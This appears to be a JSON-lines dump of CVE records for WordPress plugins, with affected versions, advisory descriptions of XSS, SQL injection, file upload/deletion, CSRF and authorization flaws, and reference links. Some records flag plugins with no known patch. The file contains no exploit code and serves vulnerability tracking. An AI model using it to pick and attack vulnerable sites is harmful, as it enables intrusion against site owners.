{"CVE_ID":"CVE-2023-6081","slug":"enigma-chartjs","versionImpact":"2023.2","description":"The chartjs WordPress plugin through 2023.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f011911-5fd1-46d9-b468-3062b4ec6f1e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f011911-5fd1-46d9-b468-3062b4ec6f1e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lynk.nl\\\/\",\"name\":\"https:\\\/\\\/lynk.nl\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5427","slug":"wp-cafe","versionImpact":"2.2.24","description":"The WPCafe \u2013 Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Reservation Form shortcode in all versions up to, and including, 2.2.24 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/336e2429-97ab-4948-9d21-f0121216d2d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/336e2429-97ab-4948-9d21-f0121216d2d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/trunk\\\/core\\\/shortcodes\\\/views\\\/reservation\\\/reservation-form-template.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/trunk\\\/core\\\/shortcodes\\\/views\\\/reservation\\\/reservation-form-template.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-cafe\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-cafe\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095135\\\/#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095135\\\/#file8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4095","slug":"jquery-collapse-o-matic","versionImpact":"1.8.5.7","description":"The Collapse-O-Matic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'expand' and 'expandsub' shortcode in all versions up to, and including, 1.8.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4c56931-c2af-4940-95e4-3f3dae51c31c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4c56931-c2af-4940-95e4-3f3dae51c31c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/baden03\\\/collapse-o-matic\\\/blob\\\/561d8ab53a03e44c12234ba9687226fdbb5054cc\\\/collapse-o-matic.php#L343\",\"name\":\"https:\\\/\\\/github.com\\\/baden03\\\/collapse-o-matic\\\/blob\\\/561d8ab53a03e44c12234ba9687226fdbb5054cc\\\/collapse-o-matic.php#L343\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jquery-collapse-o-matic\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jquery-collapse-o-matic\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/pluginoven.com\\\/plugins\\\/collapse-o-matic\\\/documentation\\\/shortcode\\\/\",\"name\":\"https:\\\/\\\/pluginoven.com\\\/plugins\\\/collapse-o-matic\\\/documentation\\\/shortcode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3094116%40jquery-collapse-o-matic&new=3094116%40jquery-collapse-o-matic&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3094116%40jquery-collapse-o-matic&new=3094116%40jquery-collapse-o-matic&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6313","slug":"forms-gutenberg","versionImpact":"2.2.9","description":"The Gutenberg Forms plugin for WordPress is vulnerable to arbitrary file uploads due to the users can specify the allowed file types in the 'upload' function in versions up to, and including, 2.2.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0315b53-46a1-46b4-a53e-0d914866ca50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0315b53-46a1-46b4-a53e-0d914866ca50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-gutenberg\\\/tags\\\/2.2.9\\\/triggers\\\/email.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-gutenberg\\\/tags\\\/2.2.9\\\/triggers\\\/email.php#L268\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-gutenberg\\\/tags\\\/2.2.9\\\/Utils\\\/Bucket.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-gutenberg\\\/tags\\\/2.2.9\\\/Utils\\\/Bucket.php#L19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4096","slug":"responsive-tabs","versionImpact":"4.0.8","description":"The Responsive Tabs WordPress plugin through 4.0.8 does not sanitise and escape some of its Tab settings, which could allow high privilege users such as Contributors and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dba5e9e-24be-458a-9150-7c7a958e66cb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dba5e9e-24be-458a-9150-7c7a958e66cb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7122","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.6","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.13.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/668621b0-67ef-44fc-a126-e8c4e372666e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/668621b0-67ef-44fc-a126-e8c4e372666e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/assets\\\/js\\\/eae.js#L568\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/assets\\\/js\\\/eae.js#L568\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/text-separator\\\/widgets\\\/text-separator.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/text-separator\\\/widgets\\\/text-separator.php#L570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/animated-gradient\\\/module.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/animated-gradient\\\/module.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/image-compare\\\/widgets\\\/image-compare.php#L537\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/image-compare\\\/widgets\\\/image-compare.php#L537\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L1045\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L1045\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addon-elements-for-elementor-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addon-elements-for-elementor-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143440\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143440\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143444\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143444\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9667","slug":"seriously-simple-podcasting","versionImpact":"3.5.0","description":"The Seriously Simple Podcasting plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.5.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4232656-2e97-4888-8dde-14039d8c2f9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4232656-2e97-4888-8dde-14039d8c2f9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seriously-simple-podcasting\\\/trunk\\\/php\\\/classes\\\/handlers\\\/class-options-handler.php#L101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seriously-simple-podcasting\\\/trunk\\\/php\\\/classes\\\/handlers\\\/class-options-handler.php#L101\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seriously-simple-podcasting\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seriously-simple-podcasting\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181485\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181485\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12253","slug":"simple-e-commerce-shopping-cart","versionImpact":"3.1.2","description":"The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'save_settings', 'export_csv', and 'simpleecommcart-action' actions in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the plugins settings and retrieve order and log data (which is also accessible to unauthenticated users).","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-e-commerce-shopping-cart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-e-commerce-shopping-cart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6a1956-73aa-4ac3-ae1c-ef5f62bad718?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6a1956-73aa-4ac3-ae1c-ef5f62bad718?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12509","slug":"embed-twine","versionImpact":"0.1.0","description":"The Embed Twine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'embed_twine' shortcode in all versions up to, and including, 0.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-twine\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-twine\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/647f0b46-ac12-445b-9d41-66eba3eb2b1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/647f0b46-ac12-445b-9d41-66eba3eb2b1a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13560","slug":"subscriptions-memberships-for-paypal","versionImpact":"1.1.6","description":"The Subscriptions & Memberships for PayPal plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246039\\\/subscriptions-memberships-for-paypal\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246039\\\/subscriptions-memberships-for-paypal\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/subscriptions-memberships-for-paypal\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/subscriptions-memberships-for-paypal\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bed7fc8-a961-4141-80a1-9c23a6504fbd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bed7fc8-a961-4141-80a1-9c23a6504fbd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1669","slug":"wpschoolpress","versionImpact":"2.2.16","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to SQL Injection via the 'addNotify' action in all versions up to, and including, 2.2.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with teacher-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks.php#L4304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks.php#L4304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7413d90-aed1-4f78-a17c-bed76efb48f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7413d90-aed1-4f78-a17c-bed76efb48f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32172","slug":"yamaps","versionImpact":"0.6.31","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yuri Baranov YaMaps for WordPress allows Stored XSS. This issue affects YaMaps for WordPress: from n\/a through 0.6.31.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/yamaps\\\/vulnerability\\\/wordpress-yamaps-for-wordpress-plugin-0-6-31-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/yamaps\\\/vulnerability\\\/wordpress-yamaps-for-wordpress-plugin-0-6-31-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6065","slug":"image-resizer-on-the-fly","versionImpact":"1.1","description":"The Image Resizer On The Fly plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete' task in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-resizer-on-the-fly\\\/trunk\\\/image-resizer-on-the-fly.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-resizer-on-the-fly\\\/trunk\\\/image-resizer-on-the-fly.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-resizer-on-the-fly\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-resizer-on-the-fly\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14877ff6-e393-41a3-91c1-fe7f477297cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14877ff6-e393-41a3-91c1-fe7f477297cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6717","slug":"b1-accounting","versionImpact":"2.2.56","description":"The B1.lt plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 2.2.56 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b1-accounting\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b1-accounting\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a601d0de-2f09-4f5c-8937-dfa20f1c64ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a601d0de-2f09-4f5c-8937-dfa20f1c64ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0556","slug":"contentstudio","versionImpact":"1.2.5","description":"The ContentStudio plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several functions in versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to obtain the blog metadata (via the function cstu_get_metadata) that includes the plugin's contentstudio_token. Knowing this token allows for other interactions with the plugin such as creating posts in versions prior to 1.2.5, which added other requirements to posting and updating.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2851006%40contentstudio%2Ftrunk&old=2844028%40contentstudio%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2851006%40contentstudio%2Ftrunk&old=2844028%40contentstudio%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/tags\\\/1.2.1\\\/contentstudio-plugin.php#L517\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/tags\\\/1.2.1\\\/contentstudio-plugin.php#L517\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52db8d41-859a-4d68-8b83-3d3af8f1bf64\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52db8d41-859a-4d68-8b83-3d3af8f1bf64\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36700","slug":"kingcomposer","versionImpact":"2.9.3.","description":"The Page Builder: KingComposer plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 2.9.3. This is due to a security nonce being leaked in the '\/wp-admin\/index.php' page. This makes it possible for authenticated attackers to change arbitrary WordPress options, delete arbitrary files\/folders, and inject arbitrary content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bdba04e-df4d-4094-877e-611d69e2e25d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bdba04e-df4d-4094-877e-611d69e2e25d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kingcomposer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kingcomposer\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2320014%40kingcomposer&new=2320014%40kingcomposer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2320014%40kingcomposer&new=2320014%40kingcomposer&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30485","slug":"avartan-slider-lite","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Solwin Infotech Responsive WordPress Slider \u2013 Avartan Slider Lite plugin <=\u00a01.5.3 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/avartan-slider-lite\\\/wordpress-avartan-slider-lite-plugin-1-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/avartan-slider-lite\\\/wordpress-avartan-slider-lite-plugin-1-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4666","slug":"borderless","versionImpact":"1.5.3","description":"The Borderless \u2013 Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6840637-9b0f-4f3d-bb73-9e4527a5f326?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6840637-9b0f-4f3d-bb73-9e4527a5f326?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/circular-progress-bar.php#L427\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/circular-progress-bar.php#L427\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/progress-bar.php#L412\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/progress-bar.php#L412\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/semi-circular-progress-bar.php#L403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/semi-circular-progress-bar.php#L403\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/team-member.php#L1101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/team-member.php#L1101\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/testimonial.php#L905\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/testimonial.php#L905\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/borderless\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/borderless\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085856\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085856\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6310","slug":"advanced-ajax-page-loader","versionImpact":"2.7.7","description":"The Advanced AJAX Page Loader plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 2.7.7. This is due to missing nonce validation in the 'admin_init_AAPL' function and missing file type validation in the 'AAPL_options_validate' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 